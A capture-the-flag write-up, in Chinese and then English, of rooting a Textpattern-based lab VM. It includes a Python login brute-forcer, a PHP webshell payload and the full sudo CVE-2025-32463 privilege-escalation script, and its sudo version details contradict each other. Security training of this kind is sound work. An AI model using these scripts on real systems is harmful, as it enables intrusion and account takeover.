本次靶机渗透实战主要结合了CMS后台漏洞与SUID本地提权。首先,通过信息收集发现80端口运行 Textpattern CMS。攻击者编写Python脚本成功爆破出后台弱口令 admin:superman,随后利用该CMS的授权远程代码执行漏洞(上传PHP Webshell)获取了 www-data 初始权限。在提权阶段,通过枚举SUID文件发现系统共存两个版本的 sudo,攻击者利用存在漏洞的指定版本(CVE-2025-32463),微调PoC路径后成功提权至 root 。最后在配置文件中提取了 todd 用户的 GRUB 哈希,但未能破解。 本次靶机渗透实战主要结合了CMS后台漏洞与SUID本地提权。首先,通过信息收集发现80端口运行 Textpattern CMS。攻击者编写Python脚本成功爆破出后台弱口令 admin:superman,随后利用该CMS的授权远程代码执行漏洞(上传PHP Webshell)获取了 www-data 初始权限。在提权阶段,通过枚举SUID文件发现系统共存两个版本的 sudo,攻击者利用存在漏洞的指定版本(CVE-2025-32463),微调PoC路径后成功提权至 root 。最后在配置文件中提取了 todd 用户的 GRUB 哈希,但未能破解。
信息收集
# Nmap 7.95 scan initiated Sun Dec 21 12:12:22 2025 as: /usr/lib/nmap/nmap -sC -sV -O -oN nmap_result.txt 192.168.110.165
Nmap scan report for 5ud0.lan (192.168.110.165)
Host is up (0.00061s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 5 (protocol 2.0)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: My site
|_http-generator: Textpattern CMS
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:F2:F5:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 21 12:12:35 2025 -- 1 IP address (1 host up) scanned in 13.92 seconds
漏洞分析
根据搜索得到管理员后台example.com/textpattern
➜ 5ud0 searchsploit textpattern
TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) | php/webapps/49996.txt
TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated) | php/webapps/50415.txt
➜ 5ud0 searchsploit -m 49996.txt
➜ 5ud0 cat 49996.txt
# Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)
# Date : 2021/09/06
# Exploit Author : Mert Daş merterpreter@gmail.com
# Software Link : https://textpattern.com/file_download/113/textpattern-4.8.7.zip
# Software web : https://textpattern.com/
# Tested on: Server : Xampp
First of all we should use file upload section to upload our shell.
Our shell contains this malicious code: <?PHP system($_GET['cmd']);?>
1) Go to content section .
2) Click Files and upload malicious php file.
3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode;
After upload our file , our request and respons is like below :
Request:
GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP;
PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Date: Thu, 10 Jun 2021 00:32:41 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
X-Powered-By: PHP/7.4.20
Content-Length: 22
Connection: close
Content-Type: text/html; charset=UTF-8
pc\mertdas
漏洞利用分析:
- 前提条件 (Authenticated):我们必须先登录后台。
- 上传点 (Upload):登录后进入
Content→Files界面。 - Payload:上传一个包含
<?PHP system($_GET['cmd']);?>的 PHP 文件。 - 触发 (Trigger):访问
/textpattern/files/你的文件名.php?cmd=whoami来执行命令。
利用
尝试弱凭据无果后,使用python暴力破解用户admin
import requests
import sys
# ================= 配置区域 =================
# 目标 URL
url = "http://textpattern.dsz/textpattern/index.php"
# 用户名
username = "admin"
# 字典路径 (Kali 默认路径)
wordlist = "/usr/share/wordlists/rockyou.txt"
# 登录失败的特征字符串
fail_string = "Could not log in"
# ===========================================
def brute_force():
print(f"[*] 正在攻击目标: {url}")
print(f"[*] 用户: {username}")
# 伪造 User-Agent 防止被拦截
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
with open(wordlist, "r", encoding="latin-1") as f:
for password in f:
password = password.strip()
# 使用 Session 对象自动处理 Cookies/PHPSESSID
s = requests.Session()
# 构造 Payload,注意 event 参数通常是 login
data = {
"p_userid": username,
"p_password": password,
"_txp_token": "", # 根据你的观察,Token 为空
"event": "login", # 尝试 login 动作
"lang": "en"
}
try:
# 发送请求
r = s.post(url, data=data, headers=headers, allow_redirects=True)
# 打印进度 (覆盖同一行)
sys.stdout.write(f"\r[-] 尝试密码: {password:<20}")
sys.stdout.flush()
# 判断逻辑:如果页面中没有“失败特征”,且状态码为 200 或 302,则可能成功
if fail_string not in r.text:
print(f"\n\n[+] 成功! 密码是: {password}")
return
except Exception as e:
# 忽略网络抖动错误
continue
except FileNotFoundError:
print(f"\n[!] 错误: 找不到字典文件 {wordlist}")
sys.exit()
if __name__ == "__main__":
brute_force()得到凭据admin:superman
登陆后上传文件即可获取用户www-data的shell
权限提升
www-data@5ud0:/tmp$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/local/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1发现两个sudo
/usr/local/bin/sudo --version → 1.9.6
/usr/bin/sudo --version → 1.9.16p2
which sudo → /usr/local/bin/sudo
在网上寻找到1.9.16p2的漏洞,即CVE-2025-32463
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}这是原来的poc,我们需要更改sudo -R woot woot这一行为/usr/local/bin/sudo -R woot woot
运行即可
经验教训
进入后在/etc/grub.d/40_custom发现todd用户的hash
➜ echo "grub.pbkdf2.sha512.10000.331CE43938E4B3E78E46FA5870701CF066644AE172308EA85401990390EF43ABCEA86EF085F010EABF28AAC613692A970FDE435B6AB36959FBF69E14F190BB17.F75B2CB6CDE13A8BBED7CD102E634216374FD9B5962C85FFB845954A98448E8D5DE5A5070B573D09043FDAFA92B8FC1BEDF59AA413EFD5000EB99B150C5FCC88" > todd_hash.txt
➜ hashcat -m 7200 todd_hash.txt /usr/share/wordlists/rockyou.txt破解不出来
Information Gathering
# Nmap 7.95 scan initiated Sun Dec 21 12:12:22 2025 as: /usr/lib/nmap/nmap -sC -sV -O -oN nmap_result.txt 192.168.110.165
Nmap scan report for 5ud0.lan (192.168.110.165)
Host is up (0.00061s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 5 (protocol 2.0)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: My site
|_http-generator: Textpattern CMS
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:F2:F5:A8 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 21 12:12:35 2025 -- 1 IP address (1 host up) scanned in 13.92 seconds
Vulnerability Analysis
According to the search, the admin backend is example.com/textpattern
➜ 5ud0 searchsploit textpattern
TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) | php/webapps/49996.txt
TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated) | php/webapps/50415.txt
➜ 5ud0 searchsploit -m 49996.txt
➜ 5ud0 cat 49996.txt
# Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)
# Date : 2021/09/06
# Exploit Author : Mert Daş merterpreter@gmail.com
# Software Link : https://textpattern.com/file_download/113/textpattern-4.8.7.zip
# Software web : https://textpattern.com/
# Tested on: Server : Xampp
First of all we should use file upload section to upload our shell.
Our shell contains this malicious code: <?PHP system($_GET['cmd']);?>
1) Go to content section .
2) Click Files and upload malicious php file.
3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode;
After upload our file , our request and respons is like below :
Request:
GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP;
PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Date: Thu, 10 Jun 2021 00:32:41 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
X-Powered-By: PHP/7.4.20
Content-Length: 22
Connection: close
Content-Type: text/html; charset=UTF-8
pc\mertdas
Exploit Analysis:
- Prerequisites (Authenticated): We must first log in to the backend.
- Upload Point: After logging in, navigate to the
Content→Filessection. - Payload: Upload a PHP file containing
<?PHP system($_GET['cmd']);?>. - Trigger: Access
/textpattern/files/yourfilename.php?cmd=whoamito execute commands.
Exploitation
After failing with weak credentials, use Python to brute-force user admin
import requests
import sys
# ================= Configuration Area =================
# Target URL
url = "http://textpattern.dsz/textpattern/index.php"
# Username
username = "admin"
# Dictionary path (Kali default)
wordlist = "/usr/share/wordlists/rockyou.txt"
# String indicating login failure
fail_string = "Could not log in"
# ===========================================
def brute_force():
print(f"[*] Attacking target: {url}")
print(f"[*] User: {username}")
# Fake User-Agent to prevent blocking
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
with open(wordlist, "r", encoding="latin-1") as f:
for password in f:
password = password.strip()
# Use Session object to automatically handle Cookies/PHPSESSID
s = requests.Session()
# Construct Payload; note that the event parameter is usually 'login'
data = {
"p_userid": username,
"p_password": password,
"_txp_token": "", # Token is empty based on your observation
"event": "login", # Attempt login action
"lang": "en"
}
try:
# Send request
r = s.post(url, data=data, headers=headers, allow_redirects=True)
# Print progress (overwrite same line)
sys.stdout.write(f"\r[-] Trying password: {password:<20}")
sys.stdout.flush()
# Logic: if the page does not contain the 'failure string' and status code is 200 or 302, it may be successful
if fail_string not in r.text:
print(f"\n\n[+] Success! Password is: {password}")
return
except Exception as e:
# Ignore network fluctuation errors
continue
except FileNotFoundError:
print(f"\n[!] Error: Dictionary file not found {wordlist}")
sys.exit()
if __name__ == "__main__":
brute_force()Obtained credentials admin:superman
After logging in, upload the file to get a shell as user www-data
Privilege Escalation
www-data@5ud0:/tmp$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/local/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1Found two sudo binaries
/usr/local/bin/sudo --version → 1.9.6
/usr/bin/sudo --version → 1.9.16p2
which sudo → /usr/local/bin/sudo
Found a vulnerability for version 1.9.16p2 online, which is CVE-2025-32463
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}This is the original PoC; we need to change the 'sudo -R woot woot' line to '/usr/local/bin/sudo -R woot woot'
Just run it.
Lessons Learned
After entering, found todd user's hash in /etc/grub.d/40_custom
➜ echo "grub.pbkdf2.sha512.10000.331CE43938E4B3E78E46FA5870701CF066644AE172308EA85401990390EF43ABCEA86EF085F010EABF28AAC613692A970FDE435B6AB36959FBF69E14F190BB17.F75B2CB6CDE13A8BBED7CD102E634216374FD9B5962C85FFB845954A98448E8D5DE5A5070B573D09043FDAFA92B8FC1BEDF59AA413EFD5000EB99B150C5FCC88" > todd_hash.txt
➜ hashcat -m 7200 todd_hash.txt /usr/share/wordlists/rockyou.txtCould not crack it.